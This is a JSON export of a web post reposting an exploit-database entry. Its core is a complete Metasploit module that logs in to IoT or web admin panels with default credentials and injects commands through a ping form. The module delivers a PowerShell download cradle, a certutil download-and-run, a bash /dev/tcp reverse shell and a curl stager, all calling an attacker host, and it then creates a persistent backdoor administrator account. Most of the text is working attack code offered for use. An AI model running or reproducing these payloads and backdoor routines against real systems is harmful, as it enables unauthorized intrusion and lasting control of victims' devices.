{"id":32941,"date":"2025-12-26T11:45:44","date_gmt":"2025-12-26T11:45:44","guid":{"rendered":"http:\/\/localhost\/?p=32941"},"modified":"2025-12-26T11:45:44","modified_gmt":"2025-12-26T11:45:44","slug":"netbus-backdoor-17-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=32941","title":{"rendered":"\ud83d\udcc4 Netbus Backdoor 1.7 Remote Code Execution_PACKETSTORM:213315"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-26T17:18:14&#8243;,&#8221;description&#8221;:&#8221;Netbus Backdoor version 1.7 Metasploit module that leverages an insecure credential storage vulnerability that then performs command injection&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Netbus Backdoor 1.7 Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213315&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Netbus Backdoor 1.7 From Legacy to Modern IoT Risks Full RCE Threat                                                         |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\\n    | # Vendor    : System built\u2011in component. No standalone download available                                                                 |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/213263\/ \\u0026 MVID-2025-0703\\n    \\n    [+] Summary    : This document traces the evolution of a Metasploit module concept from an initial theoretical\/historical analysis of the 1998 NetBus backdoor to a practical, \\n                     modern exploit module targeting insecure credential storage vulnerabilities. \\n    \\t\\t\\t\\t The journey highlights critical distinctions between academic research modules and production-ready exploits.\\n    \\n    [+] Evolution of Exploitation Techniques :\\n    \\n    1998 NetBus Model\\n        \u2193\\n    Core Vulnerability: Insecure Credential Storage\\n        \u2193\\n    Modern Manifestations:\\n    \\n    \u2022 IoT devices with default passwords\\n    \u2022 Web admin panels with hardcoded credentials  \\n    \u2022 Industrial control systems with backdoor accounts\\n        \u2193\\n    Modern Exploitation Methods:\\n    \\n    \u2022 Authentication bypass \u2192 Command injection\\n    \u2022 File upload \u2192 Remote code execution\\n    \u2022 Privilege escalation \u2192 Persistent access\\n    \\n    [+] POC :\\n    \\n    ##\\n    # This module exploits the \\&#8221;Insecure Credential Storage\\&#8221; vulnerability in modern systems\\n    # Similar to the NetBus principle but in modern web applications\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Exploit::Remote\\n      Rank = ExcellentRanking\\n    \\n      include Msf::Exploit::Remote::HttpClient\\n      include Msf::Exploit::CmdStager\\n    \\n      def initialize(info = {})\\n        super(update_info(info,\\n          &#8216;Name&#8217;           =\\u003e &#8216;IoT Device Backdoor Credential RCE&#8217;,\\n          &#8216;Description&#8217;    =\\u003e %q{\\n            This module exploits two common vulnerabilities in IoT devices and embedded systems:\\n            1. Insecure credential storage (default\/static passwords)\\n            2. Command injection via system management interface\\n    \\n            The module simulates a realistic scenario similar to NetBus but in a modern context.\\n          },\\n          &#8216;Author&#8217;         =\\u003e [\\n            &#8216;indoushka&#8217;,\\n            &#8216;Based on NetBus research by John Page (hyp3rlinx)&#8217;\\n          ],\\n          &#8216;License&#8217;        =\\u003e MSF_LICENSE,\\n          &#8216;References&#8217;     =\\u003e [\\n            [&#8216;URL&#8217;, &#8216;https:\/\/owasp.org\/www-community\/vulnerabilities\/Use_of_hard-coded_password&#8217;],\\n            [&#8216;CWE&#8217;, &#8216;798&#8217;],  # Use of Hard-coded Credentials\\n            [&#8216;CWE&#8217;, &#8217;78&#8217;],   # OS Command Injection\\n            [&#8216;TTP&#8217;, &#8216;T1078&#8217;], # Valid Accounts\\n            [&#8216;TTP&#8217;, &#8216;T1059&#8217;]  # Command and Scripting Interpreter\\n          ],\\n          &#8216;Platform&#8217;       =\\u003e [&#8216;linux&#8217;, &#8216;unix&#8217;, &#8216;win&#8217;],\\n          &#8216;Arch&#8217;           =\\u003e [ARCH_X86, ARCH_X64, ARCH_ARMLE],\\n          &#8216;Targets&#8217;        =\\u003e [\\n            [&#8216;Linux (x86\/x64)&#8217;, { &#8216;Platform&#8217; =\\u003e &#8216;linux&#8217;, &#8216;Arch&#8217; =\\u003e [ARCH_X86, ARCH_X64] }],\\n            [&#8216;Linux (ARM)&#8217;,    { &#8216;Platform&#8217; =\\u003e &#8216;linux&#8217;, &#8216;Arch&#8217; =\\u003e ARCH_ARMLE }],\\n            [&#8216;Windows&#8217;,        { &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;,   &#8216;Arch&#8217; =\\u003e [ARCH_X86, ARCH_X64] }]\\n          ],\\n          &#8216;Privileged&#8217;     =\\u003e true,\\n          &#8216;DisclosureDate&#8217; =\\u003e &#8216;2023-01-01&#8217;,\\n          &#8216;DefaultTarget&#8217;  =\\u003e 0\\n        ))\\n    \\n        register_options([\\n          OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;Base path to the vulnerable endpoint&#8217;, &#8216;\/&#8217;]),\\n          OptString.new(&#8216;USERNAME&#8217;, [true, &#8216;Default\/backdoor username&#8217;, &#8216;admin&#8217;]),\\n          OptString.new(&#8216;PASSWORD&#8217;, [true, &#8216;Default\/backdoor password&#8217;, &#8216;admin&#8217;]),\\n          OptString.new(&#8216;BACKDOOR_USER&#8217;, [false, &#8216;Username to add for persistence&#8217;, &#8216;backdoor&#8217;]),\\n          OptString.new(&#8216;BACKDOOR_PASS&#8217;, [false, &#8216;Password for the new user&#8217;, &#8216;P@ssw0rd123!&#8217;])\\n        ])\\n      end\\n    \\n      def check\\n        # Step 1: Check for default credentials\\n        print_status(\\&#8221;Checking for default credentials&#8230;\\&#8221;)\\n        \\n        res = send_login_request\\n        \\n        if res \\u0026\\u0026 res.code == 200 \\u0026\\u0026 res.body.include?(&#8216;success&#8217;)\\n          return Exploit::CheckCode::Vulnerable\\n        elsif res \\u0026\\u0026 res.code == 401\\n          return Exploit::CheckCode::Safe\\n        end\\n        \\n        Exploit::CheckCode::Unknown\\n      end\\n    \\n      def exploit\\n        print_status(\\&#8221;Attempting to exploit insecure credential storage&#8230;\\&#8221;)\\n        \\n        # 1. Authenticate using insecure credentials\\n        unless authenticate\\n          fail_with(Failure::NoAccess, &#8216;Authentication failed&#8217;)\\n        end\\n        \\n        print_good(\\&#8221;Successfully authenticated with default credentials!\\&#8221;)\\n        \\n        # 2. Use appropriate execution method based on target system\\n        case target[&#8216;Platform&#8217;]\\n        when &#8216;linux&#8217;\\n          exploit_linux\\n        when &#8216;win&#8217;\\n          exploit_windows\\n        else\\n          exploit_generic\\n        end\\n      end\\n    \\n      private\\n    \\n      def send_login_request\\n        send_request_cgi({\\n          &#8216;method&#8217;   =\\u003e &#8216;POST&#8217;,\\n          &#8216;uri&#8217;      =\\u003e normalize_uri(target_uri.path, &#8216;login.php&#8217;),\\n          &#8216;vars_post&#8217; =\\u003e {\\n            &#8216;username&#8217; =\\u003e datastore[&#8216;USERNAME&#8217;],\\n            &#8216;password&#8217; =\\u003e datastore[&#8216;PASSWORD&#8217;]\\n          },\\n          &#8216;headers&#8217;  =\\u003e {\\n            &#8216;User-Agent&#8217; =\\u003e &#8216;Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.1)&#8217;\\n          }\\n        })\\n      end\\n    \\n      def authenticate\\n        print_status(\\&#8221;Authenticating as #{datastore[&#8216;USERNAME&#8217;]}:#{datastore[&#8216;PASSWORD&#8217;]}\\&#8221;)\\n        \\n        res = send_login_request\\n        \\n        if res \\u0026\\u0026 res.code == 200\\n          # Check for authentication success in response\\n          if res.body.include?(&#8216;success&#8217;) || res.body.include?(&#8216;dashboard&#8217;) || res.get_cookies.include?(&#8216;session&#8217;)\\n            @auth_cookies = res.get_cookies\\n            return true\\n          end\\n        end\\n        \\n        false\\n      end\\n    \\n      def exploit_linux\\n        print_status(\\&#8221;Target is Linux, using command injection&#8230;\\&#8221;)\\n        \\n        # Method 1: Direct Command Injection\\n        if try_command_injection\\n          return\\n        end\\n        \\n        # Method 2: Command Stager (to upload and execute payload)\\n        print_status(\\&#8221;Attempting command stager delivery&#8230;\\&#8221;)\\n        \\n        execute_cmdstager(\\n          flavor: :curl,\\n          delay: 0.5\\n        )\\n      end\\n    \\n      def exploit_windows\\n        print_status(\\&#8221;Target is Windows, using PowerShell\/Command Prompt&#8230;\\&#8221;)\\n        \\n        # 1. Try PowerShell\\n        powershell_cmd = \\&#8221;powershell -c \\\\\\&#8221;IEX(New-Object Net.WebClient).DownloadString(&#8216;http:\/\/#{datastore[&#8216;LHOST&#8217;]}:#{datastore[&#8216;SRVPORT&#8217;]}\/shell.ps1&#8242;)\\\\\\&#8221;\\&#8221;\\n        \\n        if execute_command(powershell_cmd)\\n          return\\n        end\\n        \\n        # 2. Try CertUtil (common alternative in Windows)\\n        certutil_cmd = \\&#8221;certutil -urlcache -f http:\/\/#{datastore[&#8216;LHOST&#8217;]}:#{datastore[&#8216;SRVPORT&#8217;]}\/payload.exe C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\payload.exe \\u0026\\u0026 C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\payload.exe\\&#8221;\\n        \\n        execute_command(certutil_cmd)\\n      end\\n    \\n      def exploit_generic\\n        print_status(\\&#8221;Using generic exploitation method&#8230;\\&#8221;)\\n        \\n        # Direct command execution to return Shell\\n        cmd = \\&#8221;bash -c &#8216;bash -i \\u003e\\u0026 \/dev\/tcp\/#{datastore[&#8216;LHOST&#8217;]}\/#{datastore[&#8216;LPORT&#8217;]} 0\\u003e\\u00261&#8217;\\&#8221;\\n        \\n        execute_command(cmd)\\n      end\\n    \\n      def try_command_injection\\n        print_status(\\&#8221;Testing for command injection&#8230;\\&#8221;)\\n        \\n        test_cmds = [\\n          &#8216;; id;&#8217;, \\n          &#8216;| id |&#8217;,\\n          &#8216;`id`&#8217;,\\n          &#8216;$(id)&#8217;,\\n          &#8216;|| id ||&#8217;\\n        ]\\n        \\n        test_cmds.each do |injector|\\n          cmd = \\&#8221;ping #{injector}\\&#8221;\\n          if execute_command(cmd, check_pattern: &#8216;uid=&#8217;)\\n            return true\\n          end\\n        end\\n        \\n        false\\n      end\\n    \\n      def execute_command(cmd, opts = {})\\n        uri = normalize_uri(target_uri.path, &#8216;admin&#8217;, &#8216;ping.php&#8217;)\\n        \\n        # Inject command into parameter\\n        payload = {\\n          &#8216;host&#8217; =\\u003e \\&#8221;127.0.0.1 #{cmd}\\&#8221;,\\n          &#8216;count&#8217; =\\u003e &#8216;1&#8217;\\n        }\\n        \\n        res = send_request_cgi({\\n          &#8216;method&#8217;    =\\u003e &#8216;POST&#8217;,\\n          &#8216;uri&#8217;       =\\u003e uri,\\n          &#8216;cookie&#8217;    =\\u003e @auth_cookies,\\n          &#8216;vars_post&#8217; =\\u003e payload,\\n          &#8216;timeout&#8217;   =\\u003e 5\\n        })\\n        \\n        if opts[:check_pattern] \\u0026\\u0026 res \\u0026\\u0026 res.body.include?(opts[:check_pattern])\\n          print_good(\\&#8221;Command injection successful!\\&#8221;)\\n          print_line(\\&#8221;Output: #{res.body}\\&#8221;)\\n          return true\\n        end\\n        \\n        false\\n      rescue ::Exception =\\u003e e\\n        print_error(\\&#8221;Error executing command: #{e.message}\\&#8221;)\\n        false\\n      end\\n    \\n      # Add user for persistence (Backdoor)\\n      def add_backdoor_user\\n        return unless datastore[&#8216;BACKDOOR_USER&#8217;] \\u0026\\u0026 datastore[&#8216;BACKDOOR_PASS&#8217;]\\n        \\n        print_status(\\&#8221;Adding backdoor user #{datastore[&#8216;BACKDOOR_USER&#8217;]}&#8230;\\&#8221;)\\n        \\n        case target[&#8216;Platform&#8217;]\\n        when &#8216;linux&#8217;\\n          cmds = [\\n            \\&#8221;useradd -m -s \/bin\/bash #{datastore[&#8216;BACKDOOR_USER&#8217;]}\\&#8221;,\\n            \\&#8221;echo &#8216;#{datastore[&#8216;BACKDOOR_USER&#8217;]}:#{datastore[&#8216;BACKDOOR_PASS&#8217;]}&#8217; | chpasswd\\&#8221;,\\n            \\&#8221;usermod -aG sudo #{datastore[&#8216;BACKDOOR_USER&#8217;]} 2\\u003e\/dev\/null || usermod -aG wheel #{datastore[&#8216;BACKDOOR_USER&#8217;]} 2\\u003e\/dev\/null\\&#8221;\\n          ]\\n          \\n        when &#8216;win&#8217;\\n          cmds = [\\n            \\&#8221;net user #{datastore[&#8216;BACKDOOR_USER&#8217;]} #{datastore[&#8216;BACKDOOR_PASS&#8217;]} \/add\\&#8221;,\\n            \\&#8221;net localgroup administrators #{datastore[&#8216;BACKDOOR_USER&#8217;]} \/add\\&#8221;\\n          ]\\n        end\\n        \\n        cmds.each { |cmd| execute_command(cmd) }\\n        \\n        print_good(\\&#8221;Backdoor user added successfully!\\&#8221;)\\n      end\\n    \\n      def on_new_session(client)\\n        super\\n        \\n        # After obtaining session, add backdoor user\\n        add_backdoor_user if client.type == &#8216;meterpreter&#8217; || client.type == &#8216;shell&#8217;\\n        \\n        # User tips\\n        print_good(\\&#8221;Tips for post-exploitation:\\&#8221;)\\n        print_line(\\&#8221;1. Check system info: cat \/etc\/os-release || systeminfo\\&#8221;)\\n        print_line(\\&#8221;2. Look for interesting files: find \/ -type f -name &#8216;*.txt&#8217; -o -name &#8216;*.conf&#8217; 2\\u003e\/dev\/null\\&#8221;)\\n        print_line(\\&#8221;3. Check network connections: netstat -antup || ss -tunap\\&#8221;)\\n        \\n        if datastore[&#8216;BACKDOOR_USER&#8217;]\\n          print_line(\\&#8221;4. Backdoor credentials: #{datastore[&#8216;BACKDOOR_USER&#8217;]} \/ #{datastore[&#8216;BACKDOOR_PASS&#8217;]}\\&#8221;)\\n        end\\n      end\\n    end\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/213315&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/213315\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-26T17:18:14&#8243;,&#8221;description&#8221;:&#8221;Netbus Backdoor version 1.7 Metasploit module that leverages an insecure credential storage vulnerability that then performs command injection&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Netbus Backdoor 1.7 Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213315&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n |&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-32941","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Netbus Backdoor 1.7 Remote Code Execution_PACKETSTORM:213315 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=32941\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Netbus Backdoor 1.7 Remote Code Execution_PACKETSTORM:213315 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-26T17:18:14&#8243;,&#8221;description&#8221;:&#8221;Netbus Backdoor version 1.7 Metasploit module that leverages an insecure credential storage vulnerability that then performs command injection&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Netbus Backdoor 1.7 Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213315&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n |...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=32941\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-26T11:45:44+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32941#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32941\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Netbus Backdoor 1.7 Remote Code Execution_PACKETSTORM:213315\",\"datePublished\":\"2025-12-26T11:45:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32941\"},\"wordCount\":1498,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32941#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32941\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32941\",\"name\":\"\ud83d\udcc4 Netbus Backdoor 1.7 Remote Code Execution_PACKETSTORM:213315 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-26T11:45:44+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32941#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32941\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32941#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Netbus Backdoor 1.7 Remote Code Execution_PACKETSTORM:213315\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Netbus Backdoor 1.7 Remote Code Execution_PACKETSTORM:213315 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=32941","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Netbus Backdoor 1.7 Remote Code Execution_PACKETSTORM:213315 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-26T17:18:14&#8243;,&#8221;description&#8221;:&#8221;Netbus Backdoor version 1.7 Metasploit module that leverages an insecure credential storage vulnerability that then performs command injection&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Netbus Backdoor 1.7 Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213315&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n |...","og_url":"https:\/\/zero.redgem.net\/?p=32941","og_site_name":"zero redgem","article_published_time":"2025-12-26T11:45:44+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=32941#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=32941"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Netbus Backdoor 1.7 Remote Code Execution_PACKETSTORM:213315","datePublished":"2025-12-26T11:45:44+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=32941"},"wordCount":1498,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=32941#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=32941","url":"https:\/\/zero.redgem.net\/?p=32941","name":"\ud83d\udcc4 Netbus Backdoor 1.7 Remote Code Execution_PACKETSTORM:213315 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-26T11:45:44+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=32941#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=32941"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=32941#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Netbus Backdoor 1.7 Remote Code Execution_PACKETSTORM:213315"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero 